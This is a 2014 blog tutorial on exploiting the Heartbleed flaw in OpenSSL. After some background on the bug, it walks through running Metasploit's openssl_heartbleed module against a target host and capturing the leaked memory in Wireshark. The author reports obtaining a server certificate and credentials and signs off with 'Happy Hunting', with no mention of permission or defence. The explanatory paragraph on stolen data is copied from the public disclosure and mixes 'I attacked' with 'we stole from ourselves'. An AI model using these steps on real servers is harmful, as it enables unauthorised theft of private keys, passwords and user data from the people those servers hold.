Saturday, 26 April 2014

22.Tutorial On Exploiting Openssl's HeartBleed Vulnerability

Well Yeah You Heared It Right.In This Tutorial Am going to write about Exploiting The Recent Boom vulnerability called "HeartBleed" on one of the most widely implemented OpenSSL.

What is HeartBleed?

 The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).

The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.
What data Will You Compromise using this Attack?
 Using this,I attacked a host from outside, without leaving a trace. Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication.

Tutorial:

This can be Attacked using the Latest exploit that "metasploit" has included in it's latest update.
Am here Using the Kali Linux to Run the Metasploit console

Step 1:
  
Go to Command Prompt in Kali Linux and Run the Following Command.

root@Darkgrouz:~# msfconsole 

Step 2:

After the Msfconsole shows up with the following line you are set to go.

msf>

Then issue the following command to search for the heartbleed auxiliary

msf>search heartbleed

Msf will now search for the heartbleed auxiliary and dispaly it.
 
Step 3:

After You Got the heart Bleed Auxiliary  Path.Issue the following Command

root@Darkgrouz:~# use auxiliary/scanner/ssl/openssl_heartbleed 

Once You have done It , The console will look like this now,

msf auxiliary(openssl_heartbleed) > 

Step 4:

Then You Can Go Right into Attacking the host.
Issue these Foolowing Commands.

msf auxiliary(openssl_heartbleed) >set RHOSTS www.target.com

Then Stop All other networking applications like browsers,downloads,etc..
and start the "WIRESHARK" to sniff the traffic of heartbleed response.This can be done by simply typing the command Wreshark in terminal.

root@Darkgrouz:~#wireshark 
  
Then in wireshark choose the interface you want to sniff and click start.

Then run the following command in the msfconsole

msf auxiliary(openssl_heartbleed) >Run 

It'll then try to exploit the vulnerability if the server is vulnerable to heartbleed.

Step 5:

And if the server is vulnerable and is exploited it should return this.

msf auxiliary(openssl_heartbleed) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 

Step 6:

Check Out the traffic sniffed in the wireshark and Look for any valid data that server returns.

I do got the server Certifacte and some credentials after exploiting with this.

Feel free to contact me for further Doubts

Check Out your Luck Folks..

** Happy Hunting :)  **